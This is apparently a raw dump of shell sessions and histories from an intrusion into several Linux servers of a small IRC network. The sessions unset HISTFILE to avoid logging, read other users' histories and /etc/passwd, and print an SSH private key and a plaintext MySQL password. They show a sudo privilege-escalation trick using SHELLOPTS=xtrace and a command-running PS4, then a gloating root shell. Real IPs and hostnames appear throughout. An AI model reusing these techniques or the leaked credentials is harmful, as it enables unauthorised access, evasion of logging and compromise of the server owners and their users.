auxww|grep aster ps auxww|grep aster ps auxww|grep aster ps auxww|grep aster ps auxww|grep aster ps auxww|grep aster ps auxww|grep aster ps auxww|grep aster ps auxww|grep aster ps auxww|grep aster ps auxww|grep aster ps auxww|grep aster ps auxww|grep aster ps auxww|grep aster ps auxww|grep aster ps auxww|grep aster ps auxww|grep aster ps auxww|grep aster ps auxww|grep aster ps auxww|grep aster ps auxww|grep aster ps auxww|grep aster ps auxww|less ifconfig /sbin/ifconfig /sbin/iptables -L /sbin/iptables /sbin/iptables 00help /sbin/iptables --help /sbin/iptables -L -t nat w grep -i ipsec /etc/services grep -i sec /etc/services grep -i pptp /etc/services grep -i pp /etc/services grep -i 17 /etc/services grep -i vpn /etc/services ping -b 192.168.1.255 arp -a /sbinarp -n /sbin/arp -n ping irc.humpmeg.net ping irc.humpmeg.net w screen -x ssh gumbie@www.zloche.net -v ping www.zloche.net ping server.zloche.net ping server1.zloche.net cat .ssh/authorized_keys sz .ssh/authorized_keys ls ls .ssh less .ssh/authorized_keys ls -la .ssh w ps auxww|grep dead ps auxww|grep pts/6 ps auxww|grep 508 w ifconfig /sbin/ifconfig /sbin/arp -ae screen -x screen -ls ssh 192.168.1.3 ssh 192.168.1.3 arp -en /sbin/arp -en ssh 192.168.1.3 ssh 192.168.1.3 -v /sbin/arp -en ping -b 192.168.1.255 ssh 192.168.1.3 -v ssh 192.168.1.8 -v ls /home su - ircd ls -la /var/log w w fg su - ircd ssh ircd ssh ircd@localhost ssh ircd@localhost -P 443 ssh ircd@localhost -p443 /sbin/infconfig /sbin/ifconfig ping 192.168.1.255 ping -b 192.168.1.255 /sbin/arp -en ping -b 192.168.1.255 ping -b 192.168.1.255 ping -b 192.168.1.255 ping -b 192.168.1.255 ping -b 192.168.1.255 ping 192.168.1.103 ssh -v 192.168.1.103 ssh -v 192.168.1.103 w screen -x screen -x w w tty ps x irssi epic irc xchat xchat export DISPLAY=71.192.64.22:0 xchat export DISPLAY=71.192.64.22:1 xchat export DISPLAY=71.192.64.22:0.0 xchat export DISPLAY=71.192.64.22:10.0 xchat export DISPLAY=71.192.64.22:10.1 xchat export DISPLAY=127.0.0.1:10 xchat export DISPLAY=127.0.0.1:0 xchat export DISPLAY=127.0.0.1:0.10 xchat man ssh less /etc/ssh/sshd_config less /etc/ssh/ssh_config w w pico .screenrc vi .screenrc ls -la mkdir Incoming mv kibitz unreal.tgz Incoming/ w w /sbin/ifconfig ssh -v 192.168.1.8 ps x screen -ls sudo su - cat /etc/sudoers ls /home ls -la ssh ircd ssh ircd@localhost ssh ircd@localhost -p 443 ssh ircd@localhost -p 443 ssh ircd@localhost -p 443 ssh ircd@localhost -p 443 ssh ircd@localhost -p 443 ps x screen -ls s ssh ircd@localhost -p 443 sudo su - ssh irc@localhost -p 443 ssh irc@localhost -p 443 w w screen -ls screen -x screen -e^Tt screen -x screen -x pwd touch test ls -la ls -la sudo su - ls -la cd /root su - ls -l /dev/rstm01/bash /dev/rstm01/bash sudo su - /dev/rstm01/bash man bash w uname -a sudo su - sudo su - top df ls /mnt ls /mnt/Rasterized/ ls /mnt/Rasterized/Rasterized\ Drive/ ls /mnt/Rasterized/Rasterized\ Drive/codecs/ ls /mnt/Rasterized/Guitar\ Pro\ 5/ ls /mnt/cstrike/ w screen -x ps x top dmesg smbstatus w kill -1 -1 w sudo su - sudo su - sudo su - sudo su - sudo su - sudo su - mysql -p /usr/local/mysql/bin/mysql -p /usr/local/mysql/bin/mysql -p /usr/local/mysql/bin/mysql -p /usr/local/mysql/bin/mysql -p /usr/local/mysql/bin/mysql -p sudo su - sudo su - sudo su - sudo su - mysqladmin -p shutdown sudo su - mysql -u ircd -p rasnet screen -x sudo su - screen -x sudo su - screen -x screen -ls w ps x screen -e^Tt screen -x screen -x uptime ping escape.com ping escape.com -c 10 sudo su - sudo su - screen -x sudo su - sudo su - sudo su - sudo su - sudo su - sudo su - sudo su - sudo su - sudo su - mysql -p -u gumbie mysql -p -u gumbie mysql -p -u gumbie fg fg sudo su - sudo su - sudo su - sudo su - sudo su - w w ps x sudo su - sudo su - w ps auxww | grep mysqld mysql -p mysql -p w screen -ls screen -e^Gg ls rm *.tgz screen -x screen -e^Gg ls screen -x screen -x exit ssh -p 22 irc3.zloche.net ssh -p 22 irc3.zloche.net ssh -p 22 irc3.zloche.net screen -x passwd screen -x screen -x screen -x screen -x screen -x screen -x ls screen -x screen -e ^Tt screen -x man pdisk man fdisk man fdisk man -k mbr man gdisk man -k disk | less sudo su - host irc.rasterized.net screen -x screen -e^Tt screen -x screen -x screen -x screen -x screen -x screen -e^Tt screen -x date date rdate -s date.nist.gov rdate -s time.nist.gov rdate -s time-a.nist.gov rdate -a time-a.nist.gov rdate -s time-a.nist.gov screen -x sudo rdate -a time-a.nist.gov date screen -e^Tt screen -x screen -x screen -x screen -x [root@localhost gumbie]# cat .mysql_history _HiStOrY_V2_ set\040password\040=\040password("vfr1000r"); \134q show\040grants ; show tables; select * from anope_os_news; use rasnet flush tables with read lock; show mast status; show master status; unlock tables ; show mast status; show master status; select * from anope_ns_access \G select * from anope_ns_core \G \q show databases ; use gumbie show tables; use Raster show tables ; shot datbases ; show databases; use rasnet show tables; show master status \G status; show sessions \G show sessions ; show ? ; help show \1q \q show master status ; flush tables with read lock; show master status ; unlock tables ; \q [root@localhost gumbie]# exit [deadlyacid@localhost ~]$ ssh zloche@80.248.208.223 The authenticity of host '80.248.208.223 (80.248.208.223)' can't be established. RSA key fingerprint is 83:0f:75:06:d2:da:85:fd:1c:93:39:83:89:7c:25:99. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added '80.248.208.223' (RSA) to the list of known hosts. Password: Linux vds349.sivit.org 2.6.12.6-xenU #1 SMP Fri Feb 24 01:08:35 CET 2006 i686 GNU/Linux The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. You have mail. Last login: Sat Jun 9 15:57:56 2007 from bas10-montreal02-1177583918.dsl.bell.ca vds349.sivit.org> unset HISTFILE ; unset SAVEHIST vds349.sivit.org> bash zloche@vds349:~$ unset HISTFILE ; unset SAVEHIST zloche@vds349:~$ w 17:34:32 up 174 days, 14:23, 4 users, load average: 0.00, 0.01, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT zloche pts/9 bas10-montreal02 15:57 19:17 0.01s 0.01s -bash stax pts/7 :2.0 02Jan07 156days 0.05s 0.05s -bash zloche pts/13 bas10-montreal02 15:57 52:29 0.02s 0.02s -bash zloche pts/17 c-76-108-85-21.h 17:33 0.00s 0.02s 0.01s w zloche@vds349:~$ ps aux USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND root 1 0.0 0.0 1580 112 ? S 2006 3:33 init [4] root 2 0.0 0.0 0 0 ? S 2006 0:49 [migration/0] root 3 0.0 0.0 0 0 ? SN 2006 0:05 [ksoftirqd/0] root 4 0.0 0.0 0 0 ? S< 2006 4:27 [events/0] root 5 0.0 0.0 0 0 ? S< 2006 0:01 [khelper] root 6 0.0 0.0 0 0 ? S< 2006 0:00 [kthread] root 7 0.0 0.0 0 0 ? S< 2006 0:00 [xenwatch] root 8 0.0 0.0 0 0 ? S< 2006 0:00 [xenbus] root 11 0.0 0.0 0 0 ? S< 2006 0:46 [migration/1] root 12 0.0 0.0 0 0 ? SN 2006 0:01 [ksoftirqd/1] root 13 0.0 0.0 0 0 ? S< 2006 0:49 [events/1] root 16 0.0 0.0 0 0 ? S< 2006 0:25 [kblockd/0] root 17 0.0 0.0 0 0 ? S< 2006 0:30 [kblockd/1] root 49 0.0 0.0 0 0 ? S 2006 7:26 [kswapd0] root 50 0.0 0.0 0 0 ? S< 2006 0:00 [aio/0] root 51 0.0 0.0 0 0 ? S< 2006 0:00 [aio/1] root 52 0.0 0.0 0 0 ? S< 2006 0:00 [xfslogd/0] root 53 0.0 0.0 0 0 ? S< 2006 0:00 [xfslogd/1] root 54 0.0 0.0 0 0 ? S< 2006 0:00 [xfsdatad/0] root 55 0.0 0.0 0 0 ? S< 2006 0:00 [xfsdatad/1] root 56 0.0 0.0 0 0 ? S 2006 0:30 [xfsbufd] root 595 0.0 0.0 0 0 ? S 2006 30:27 [kjournald] daemon 10217 0.0 0.1 1684 188 ? Ss 2006 0:00 /sbin/portmap root 10289 0.0 0.1 1576 188 ? Ss 2006 0:01 /sbin/klogd root 10677 0.0 0.0 2800 116 ? Ss 2006 0:00 /usr/sbin/famd -T root 10706 0.0 0.3 1816 456 ? Ss 2006 0:45 /usr/sbin/cron root 10734 0.0 0.1 1572 232 tty1 Ss+ 2006 0:00 /sbin/getty 38400 root 10735 0.0 0.2 2556 300 ? Ss 2006 0:00 /bin/sh /command/ root 10737 0.0 0.0 136 20 ? S 2006 3:41 svscan /service root 10738 0.0 0.0 92 4 ? S 2006 0:00 readproctitle ser root 10739 0.0 0.0 100 16 ? S 2006 26:51 supervise dnscach root 10740 0.0 0.0 104 20 ? S 2006 0:00 supervise log dnslog 10742 0.0 0.0 108 4 ? S 2006 5:12 multilog t /var/l root 25936 0.0 1.2 24652 1680 ? Ss 2006 23:29 /usr/bin/spamd -d root 13041 0.0 0.5 16924 672 ? S 2006 0:08 cpsrvd - waiting ircd 13243 0.0 2.3 5716 3096 ? S Jan01 37:48 ./ircd root 28865 0.0 0.3 4824 424 ? Ss Jan02 0:02 /usr/bin/X11/xfs root 29047 0.0 0.2 2604 276 ? S Jan02 0:00 /bin/bash /etc/in root 29048 0.0 0.2 2604 276 ? S Jan02 0:00 /bin/bash /etc/in root 29049 0.0 0.2 11712 340 ? S Jan02 0:00 /usr/X11R6/bin/Xp root 29051 0.0 0.2 2604 276 ? S Jan02 0:00 /bin/bash /etc/in stax 29260 0.0 0.3 11412 508 ? S Jan02 2:08 Xtightvnc :1 -des stax 29269 0.0 0.2 10900 384 ? S Jan02 0:07 x-window-manager stax 29283 0.0 0.3 11760 528 ? Ss Jan02 3:47 xfce-mcs-manager stax 3320 0.0 0.3 10176 508 ? S Jan02 52:56 Xtightvnc :2 -des stax 3328 0.0 0.3 5480 452 ? S Jan02 4:55 xterm -geometry 8 stax 3329 0.0 0.2 10748 364 ? S Jan02 0:00 x-window-manager stax 3336 0.0 0.3 11728 520 ? Ss Jan02 3:44 xfce-mcs-manager stax 3337 0.0 0.2 2652 300 pts/7 Ss+ Jan02 0:00 -bash root 18154 0.0 0.3 1828 404 ? Ss Jan09 0:00 /sbin/rpc.statd nagios 14637 0.0 0.2 4412 304 ? Ss Feb02 0:00 ./ndo2db-2x -c /u stax 8120 0.0 0.3 12336 532 ? S Feb02 3:43 ./sc_serv stax 8121 0.0 0.3 12336 532 ? S Feb02 0:21 ./sc_serv stax 8122 0.0 0.3 12336 532 ? S Feb02 14:41 ./sc_serv stax 8123 0.0 0.3 12336 532 ? S Feb02 8:53 ./sc_serv stax 8124 0.0 0.3 12336 532 ? S Feb02 15:06 ./sc_serv stax 8174 0.0 0.3 15868 520 ? S Feb02 3:48 ./sc_serv stax 8175 0.0 0.3 15868 520 ? S Feb02 0:22 ./sc_serv stax 8176 0.0 0.3 15868 520 ? S Feb02 18:29 ./sc_serv stax 8177 0.0 0.3 15868 520 ? S Feb02 8:38 ./sc_serv stax 8178 0.0 0.3 15868 520 ? S Feb02 18:13 ./sc_serv root 3360 0.0 0.3 1620 408 ? Ss Feb04 3:33 /sbin/syslogd root 741 0.0 0.4 3804 588 ? Ss Feb04 0:59 /usr/sbin/sshd cyrus 14369 0.0 0.1 2476 220 ? Ss Feb04 0:00 /usr/sbin/pwcheck root 6103 0.0 0.2 1608 340 ? Ss Feb05 1:21 /usr/sbin/inetd root 19002 0.0 0.4 2380 644 ? S Feb05 0:52 /bin/sh ./festiva root 19012 0.0 0.3 23620 424 ? S Feb05 0:00 ./festival --serv dnscache 19611 0.0 0.0 1432 116 ? S Feb05 0:01 /usr/local/bin/dn www-data 8569 0.0 0.4 33460 624 ? S Mar01 0:24 /usr/local/bin/pe www-data 8570 0.0 0.7 32472 1044 ? S Mar01 0:29 /usr/local/bin/pe root 3052 0.0 0.0 0 0 ? Z Mar08 0:00 [festival] Home of zloche@zloche.net zloche@vds349:~/public_html$ su -l djdd bash: /bin/su: Permission denied zloche@vds349:~/public_html$ su -l djdd bash: /bin/su: Permission denied zloche@vds349:~/public_html$ man login Reformatting login(1), please wait... zloche@vds349:~/public_html$ login djdd No utmp entry. You must exec "login" from the lowest level "sh" zloche@vds349:~/public_html$ exit vds349.sivit.org> login djdd No utmp entry. You must exec "login" from the lowest level "sh" vds349.sivit.org> vds349.sivit.org> logout Connection to 80.248.208.223 closed. [deadlyacid@localhost ~]$ ssh djdd@80.248.208.223 Password: Linux vds349.sivit.org 2.6.12.6-xenU #1 SMP Fri Feb 24 01:08:35 CET 2006 i686 GNU/Linux The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Thu Jun 7 10:19:12 2007 from server4.zloche.net djdd@vds349:~$ ls -alh total 52K drwxrwxrwx 6 djdd vhost 4.0K Jun 6 17:04 . drwx--x--x 22 root staff 4.0K Jun 3 16:33 .. -rw------- 1 djdd djdd 3.5K Jun 7 15:07 .bash_history -rw-r--r-- 1 djdd djdd 567 Oct 27 2006 .bash_profile -rw-r--r-- 1 djdd djdd 1.8K Oct 27 2006 .bashrc -rwxr-xr-x 1 djdd djdd 12K Jun 6 16:55 .cshrc drwx------ 2 djdd djdd 4.0K Mar 28 14:19 .irssi drwx------ 2 djdd djdd 4.0K Nov 9 2006 .ssh drwxr-xr-x 5 djdd djdd 4.0K Oct 27 2006 .usermin -rwxr-xr-x 1 djdd djdd 40 Jun 6 17:04 .x.sh drwxrwxrwx 3 djdd djdd 4.0K Nov 4 2006 public_html djdd@vds349:~$ cat .bash_history ls mkdir public_html mv * public_html/ ls -l ls -la chmod og-w . mkdir public_html fg exit lynx www.gmail.com hmmmm www.liveitsolution.com whois liveitsolution.com |less dig liveitsolution.com soa no soa dig liveitsolution.com NS dig liveitsolution.com dig liveitsolutions.com NS dig www.liveitsolution.com whois liveitsolution.com |less dig @216.40.47.15 liveitsolutions.com NS dig @216.40.47.16 liveitsolutions.com NS dig @216.40.47.16 liveitsolutions.com soa dig @216.40.47.15 liveitsolutions.com soa dns1.registerfly.com dig @216.40.47.15 liveits.com soa whois liveits.com |less dig @216.40.47.15 liveits.com soa dig @216.40.47.15 liveits.com dig @216.40.47.15 liveits.com ns dig liveits.com whois liveits.com |less whois liveits.com | grep "Name Server" whois liveits.com |less whois liveits.com | grep "Name Server" well, we have plenty of time to set this up....im in no hurry passwd kibitz -tty pts/5 gumbie kibitz -tty pts/5 gumbie mesg y kibitz -tty pts/5 gumbie 'mesg y' kibitz -tty pts/5 gumbie kibitz -24213 exit id ssh-add ssh-add ssh-add scp -P 443 .ssh/id_dsa DJDD@rasterized.net./.ssh/id_dsa scp -P 443 .ssh/id_dsa DJDD@rasterized.net:/.ssh/id_dsa scp -P 443 .ssh/id_dsa DJDD@rasterized.net:.ssh/id_dsa ssh DJDD@rasterized.net -p 443 -v ssh-keygen ssh-keygen -t dsa ssh-keygen -t dsa ls .ssh cat .ssh/id_dsa.pub ssh djdd@rasterized.net -P443 -v ssh djdd@rasterized.net -P 443 -v ssh djdd@rasterized.net -p 443 -v ssh DJDD@rasterized.net -p 443 -v ssh DJDD@rasterized.net -p 443 -v ssh DJDD@rasterized.net -p 443 -v ssh-agent bash passwd kibitz -tty pts/5 gumbie kibitz pts/5 gumbie kibitz -tty gumbie ls -l `which kibitz` kibitz -tty pts/5 gumbie mesg mesg y kibitz -tty pts/5 gumbie kibitz -29378 hmm kibitz -39398 kibitz -tty pts/5 gumbie i did kibitz-29459 kibitz -29459 exit cd ~ ls cd public_html ls cd .. ls -al cd .. ls -al ls djdd -al ls -al ls passwd ssh craplandia.org screen irssi screen -raAd screen -raAd exit exit w uname -a find ../ ls -alR ../ cat /etc/passwd cat /etc/passwd | grep "bash" cd /home/cyrus ls -alh cd /home/raster ls -alh cd /home/stax ls -alh cd "%backup%~" file \%backup\%\~ less \%backup\%\~ clear ls -alh screen -raAd screen irssi top exit screen -raAd exit w ls -alh id ls ls -l ../ cd ~irc cd ~ircd uname -a screen -raAd screen irssi ls screen -RR screen -raAd w write stax 7 was that you? write stax pts/7 was that you? write stax was that you? who write stax tty7 was that you? mesg y write user stax was that you? w'ddddddgklasdfjakfgkl'jakldf wall man write screen -raAd screen irssi exit screen -raAd screen irssi screen -raAd exit w uname -a w sudo --version man sudo q sudo -V ls -alh cat .bash_history unenv | grep -i "hist" env | grep -i "hist" env | grep -i "user" cat > .cshrc cd ~ pwd setenv SHELLOPTS xtrace SHELLOPTS=xtrace export SHELLOPTS=xtrace exit ls csh chsh tcsh tgcsh ls -l /bin | grep "sh" w cat /etc/shells /bin/csh sh vim .bashrc vi .bashrc vi .bash_profile grep "SHELLOPTS" .bashrc vi .bahrc vi .bashrc ls -alh .bashrc vi .bashrc touch -t 200610271634 .bashrc ls -alh .bashrc w man xtrace xtrace vi .x.sh env | grep "PS4" echo $PS4 export PS4=`$(chown root.root .cshrc)` export PS4='$(chown root.root .cshrc)' echo $PS4 chmo +x .x.sh chmod +x .x.sh sudo ./.x.sh ls -alh ls -lisa .cshrc sudo id ls w su -l stax ls -alh su ls -alh /bin/susu ls -alh /bin/su sudo sustax -l screen -raAd exit host server4 host server3 host server2 host server1 host server6 host server7 host server8 screen -raAd djdd@vds349:~$ cd .ssh djdd@vds349:~/.ssh$ ls -alh total 20K drwx------ 2 djdd djdd 4.0K Nov 9 2006 . drwxrwxrwx 6 djdd vhost 4.0K Jun 6 17:04 .. -rw------- 1 djdd djdd 736 Nov 9 2006 id_dsa -rw-r--r-- 1 djdd djdd 611 Nov 9 2006 id_dsa.pub -rw-r--r-- 1 djdd djdd 680 Apr 18 15:30 known_hosts djdd@vds349:~/.ssh$ cat id_dsa -----BEGIN DSA PRIVATE KEY----- Proc-Type: 4,ENCRYPTED DEK-Info: DES-EDE3-CBC,5A84045F7AE97BF5 OLpiQ4jAqNOvsx5EVaY5NtqAXYEhvy3z6AuL3dskW6WlgP4jCTykd2dTfcuY+7YV HqhVI/izngdTgBVoz5xdsLwxPmXKYv7H6GBISHRzpAyq04XtI63a3lA2CIf+PKBV m09LxyFAJ88t5j3X1V9E99pFCmVBkfjRDvIaKUbRhjWsATKh3Imm71OPqdZumA0q 3CGh0qEZW72I0l0xzBIUeEajfS3CSfxs2XOBeXLlG+eh1SmMdaS96R00pWiy4VCy p/WBpQ9kDexlEfKPGNPpd4Stc9cZVNWb+2HXMXj6xriekcvSb30i/UrtJgVb9S+R Xrhx4AC2XjCmw82KHvCqgrWN746deHdC22huP2n1Ig4mldhMrK6UqWNzavwJ/btv nEMNn3r1hoQ8rhHn9PePeXOOxvc6D99vKhkI16RH0Ol+IXvyKPoqPJgaz8WGbvmC rq3Brdt6iIa9/wPXLwB6bo7zPQ/uB3akg+s+e2laqWGuItvgcfurfJp9108WoFM0 y600xzfQxpOPqGzIjWa359O/v1opX1zviHjuI5NHUDOkKBoIXT8VZdAZr3SbGAMh 6td52Ps+2x3pdyYEiQx8NA== -----END DSA PRIVATE KEY----- djdd@vds349:~/.ssh$ cat id_dsa.pub ssh-dss AAAAB3NzaC1kc3MAAACBAI6Lc8yLa2rY9x0usKkIuF+KOrnNY9rXPb4QepTiCnT0 XeeO3xvp/U2UGKFNRwvVIVRvBnlQYxLjNyPLq5b7GyOWF1wheREiyDwwPn/Ei67i 3flFSEEigwStaYZyqUblyhGb8V+/zuM6IU0+fUyJ3njg2dYCzuS6EmxG6CEXwYmJ AAAAFQCuVVp4oCYDMEhVcrba8Rp8MlDE8QAAAIA+pKsVtYmlcxOUhuMLGgiLyM2e /eV7xaeLqFD3fxSog7XjtuTxJlb7TzJ8X0/q0mLtfk4n/+kRX7UJCfLmzOgcR9vu ROUWwt4VU5Aw4iFf8OuPgT2y5SlnGKlSNupStubGNIVO+PNKR6aW82KzpRQXEkCY DfFBJGlG5JQr2KLpKgAAAIBk3u6xP29pU92Qwg+5DJuE6L4kHHW2f1NPjoCFb1wO cf2yi2V4eT8prKP+IFjqOfuCaTB+0fK/kWtX/vTA/lei3x19JKLHwY0+nMmnvvep VBch5IrPyZQs4zyPFRxc7cWAgXdPETdrCZ/q5h4CI2qBvXQ2gfckFcaOZWwET13l Nw== djdd@vds349.sivit.org djdd@vds349:~/.ssh$ cat known_hosts rasterized.net,69.163.232.231 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAyaQ6kpWI3wBfCGF+/EGC8JLuPI4ahiREMNe0 e/vUAfFjT044zOVoowDC0Ek1wgh0TAuv3Dzjz6XxknwMkaYo/KCM+CmTAQqYGj4A wxUrzy4ImUJNxvQVJxrHRL40B61lT+lSXpgsjBTaV4qWE5vTIMoa9uz1159D5CpH MuAKU70= 76.108.85.21 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAyaQ6kpWI3wBfCGF+/EGC8JLuPI4ahiREMNe0 e/vUAfFjT044zOVoowDC0Ek1wgh0TAuv3Dzjz6XxknwMkaYo/KCM+CmTAQqYGj4A wxUrzy4ImUJNxvQVJxrHRL40B61lT+lSXpgsjBTaV4qWE5vTIMoa9uz1159D5CpH MuAKU70= 127.0.0.1 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAzYgpHj6TWctv9JPyCM/uWdHMWWgnMmR9KkDX ZuiGVSNc/FyxIq6soDPhQ6nsYw3NoKEczB1aC6u1RMqueWyd0LLZD2QIVmJ1ijRt QDibKXEmlquOTUNZzB0RQIKgI4FOlpojpqTMziRUom2qChYoVBFLimYvH+b3fcla QaSichE= djdd@vds349:~/.ssh$ logout Connection to 80.248.208.223 closed. [deadlyacid@localhost ~]$ ssh djdd@213.251.160.26 The authenticity of host '213.251.160.26 (213.251.160.26)' can't be established. RSA key fingerprint is fe:ea:94:0b:a9:04:aa:e4:d3:d6:dd:f8:cd:a9:8c:f3. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added '213.251.160.26' (RSA) to the list of known hosts. Password: Linux ks32211.kimsufi.com 2.4.33grs-bipiv-ipv4-32 #1 SMP lun oct 23 19:00:07 CEST 2006 i686 GNU/Linux machine : 8410 ip : 213.251.160.26 hostname : ks32211.kimsufi.com Welcome on Server4, the 4th server of the zloche network =] Last login: Fri Jun 8 17:50:48 2007 from 216.186.154.117 djdd@server4:~$ unset HISTFILE ; unset SAVEHIST djdd@server4:~$ uname -a Linux server4.zloche.net 2.4.33grs-bipiv-ipv4-32 #1 SMP lun oct 23 19:00:07 CEST 2006 i686 GNU/Linux djdd@server4:~$ cat /etc/issue Debian GNU/Linux 3.1 \n \l djdd@server4:~$ ls -alh total 32K drwxr-xr-x 3 djdd djdd 4.0K 2007-02-01 04:28 . d-wx--s--x 17 root root 4.0K 2007-05-06 03:51 .. -rw-r--r-- 1 djdd djdd 266 2007-02-01 04:24 .alias -rw------- 1 djdd djdd 819 2007-06-08 17:55 .bash_history -rw-r--r-- 1 djdd djdd 567 2007-02-01 04:24 .bash_profile -rw-r--r-- 1 djdd djdd 1.8K 2007-02-01 04:24 .bashrc -rw-r--r-- 1 djdd djdd 375 2007-02-01 04:24 .cshrc drwx------ 2 djdd djdd 4.0K 2007-02-01 04:28 .ssh djdd@server4:~$ cat .bash_history w who ssh 66.168.220.yes ssh 66.168.220.212:443 ssh 66.168.220.212 443 ssh 443 66.168.220.212 man ssh ssh -D 443 66.168.220.212 sudo ssh -D 443 66.168.220.212 sudo ssh -D 443 66.168.220.212 ssh 66.168.220.212 w exit ping www.thednscentre.com exit exit irssi ssh craplandia.org ssh craplandia.org ssh craplandia.org ssh craplandia.org screen -raAd exit passwd screen irssi ssh zloche.net ssh zloche.net exit ssh zloche.net exit ssh zloche.net ssh zloche.net w who ssh zloche.net exit cat /etc/motd uname -a sudo id w who w who users ls -alh cd .ssh ls cat known_hosts ssh djdd@66.168.220.212 who who w users ps aux kill -9 7018 ps -aux ps aux last -n 10 ls ls -alh cat .bash_history ssh zloche.net ssh zloche.net ssh zloche.net ssh zloche.net ssh zloche.net ssh zloche.net ssh craplandia.org ssh craplandia.org exit djdd@server4:~$ cd .ssh djdd@server4:~/.ssh$ ls -alh total 12K drwx------ 2 djdd djdd 4.0K 2007-02-01 04:28 . drwxr-xr-x 3 djdd djdd 4.0K 2007-02-01 04:28 .. -rw-r--r-- 1 djdd djdd 1.1K 2007-05-10 22:52 known_hosts djdd@server4:~/.ssh$ cat known_hosts 66.168.220.212 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAtmDaXUYBfpbI9nF khEnqjRxLMWLxfkDdxeKDMs5orhRjRa8GQ1AC3KpC7y+TaonfUM/dSXR0+1K1BJUtT AWxe5ZeCDKL4phDbubxDIJvFKcTfNi+bjiwkHlz1OKDThvqtRt781wcJRnSbnXinhZ k8Ia3v6AIHsoB5x/yljSwznrSDWuVwn5LSkNtISOiOX91ItfxwKi8B0ZgSBdUkmAHq Myej98cRVvY/iATI5SrFRCfWNkC7gH/oFxXM/bKB94H7TZ4W6wtfdjmkBrYxojDbUK KEfd1LywcJCTYxab8usl+Q39uYvqTfXwJDIYX+BE810BNmXi0QA6WlYUOpMJj9Q== craplandia.org,74.69.17.126 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEA5v HP/DNtJSXwf+2YNhLD9MX2HkcuNqhGNtmJ6/sis9MTAQTEqnTi0Nw4yaoQL0qFM7nZ kS8OGQI0X55c0Ud0JEXjbXuikZEFUtzr2A+up19wewbpMsMRac87r+vtU218ozOUjY uurhJwF58DhrUKLrTwa5hl8pRFTifSqhrhKCMBdQreHkmR8GoHIohMdkaPyIACKBgA aUDFX4VHoYW7AbJlO/3cJLxWEHoUkRM9aHi6tfqXt69e8W1LGXCEI83xUyjOT+ndCm 3x+w/Scuw7kBrjSYg0CXaxDTR5l8lBMJAdenr9CFWPMKbeOLrvdAlpPewJ5EKRSxY4 sWZqZwaqWQ== zloche.net,80.248.208.223 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAzYgp Hj6TWctv9JPyCM/uWdHMWWgnMmR9KkDXZuiGVSNc/FyxIq6soDPhQ6nsYw3NoKEczB 1aC6u1RMqueWyd0LLZD2QIVmJ1ijRtQDibKXEmlquOTUNZzB0RQIKgI4FOlpojpqTM ziRUom2qChYoVBFLimYvH+b3fclaQaSichE= djdd@server4:~$ w 00:52:32 up 35 days, 22:54, 1 user, load average: 0.00, 0.00, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT djdd@server4:~$ who djdd pts/0 Jun 10 00:50 (c-76-108-85-21.hsd1.fl.comcast.net) djdd@server4:~$ who -a May 5 01:58 2198 id=si term=0 exit=0 system boot May 5 01:58 run-level 2 May 5 01:58 last=S May 5 01:59 8763 id=l2 term=0 exit=0 LOGIN tty1 May 5 01:59 14410 id=1 LOGIN tty2 May 5 01:59 22055 id=2 LOGIN tty3 May 5 01:59 15373 id=3 LOGIN tty4 May 5 01:59 13138 id=4 LOGIN tty5 May 5 01:59 28322 id=5 LOGIN tty6 May 5 01:59 27969 id=6 LOGIN ttyS0 May 5 01:59 8347 id=T0 djdd + pts/0 Jun 10 00:50 . 27808 (c-76-108-85-21.hsd1.fl.comcast.net) pts/1 Jun 8 16:54 11261 id=ts/1 term=0 exit=0 pts/2 May 17 19:01 12001 id=ts/2 term=0 exit=0 pts/3 May 10 22:51 15317 id=/3 term=0 exit=0 pts/3 Jun 8 16:53 20448 id=ts/3 term=0 exit=0 pts/5 Jun 1 05:44 24188 id=ts/5 term=0 exit=0 pts/6 Jun 8 16:54 21971 id=ts/6 term=0 exit=0 pts/7 Jun 7 18:53 20846 id=ts/7 term=0 exit=0 pts/8 Jun 7 18:59 29897 id=ts/8 term=0 exit=0 djdd@server4:~$ id uid=1005(djdd) gid=1005(djdd) groups=1005(djdd) djdd@server4:~$ sudo id Password: uid=0(root) gid=0(root) groups=0(root) djdd@server4:~$ # AHAHAHAHAHA djdd@server4:~$ sudo su -l su: invalid option -- l Usage: su [OPTS] [-] [username [ARGS]] - make this a login shell -c, --command= pass command to the invoked shell using its -c option -m, -p, --preserve-environment do not reset environment variables, and keep the same shell -s, --shell= use shell instead of the default in /etc/passwd djdd@server4:~$ sudo su - server4:~# unset HISTFILE ; unset SAVEHIST server4:~# w 00:54:14 up 35 days, 22:56, 1 user, load average: 0.00, 0.00, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT djdd pts/0 c-76-108-85-21.h 00:50 0.00s 0.04s 0.00s sshd: djdd [pri server4:~# ps aux USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND root 1 0.0 0.2 1492 504 ? S May05 0:34 init [2] root 2 0.0 0.0 0 0 ? S May05 0:00 [keventd] root 3 0.0 0.0 0 0 ? SN May05 0:07 [ksoftirqd_CPU0] root 4 0.0 0.0 0 0 ? S May05 0:08 [kswapd] root 5 0.0 0.0 0 0 ? S May05 0:00 [bdflush] root 6 0.0 0.0 0 0 ? S May05 0:12 [kupdated] root 7 0.0 0.0 0 0 ? S< May05 0:00 [mdrecoveryd] root 8 0.0 0.0 0 0 ? S May05 0:23 [kjournald] root 13233 0.0 0.0 0 0 ? S May05 0:20 [kjournald] root 29859 0.0 0.3 2244 788 ? Ss May05 0:43 /sbin/syslogd root 14962 0.0 0.1 1492 464 ? Ss May05 0:00 /sbin/klogd root 28307 0.0 17.2 44216 42648 ? 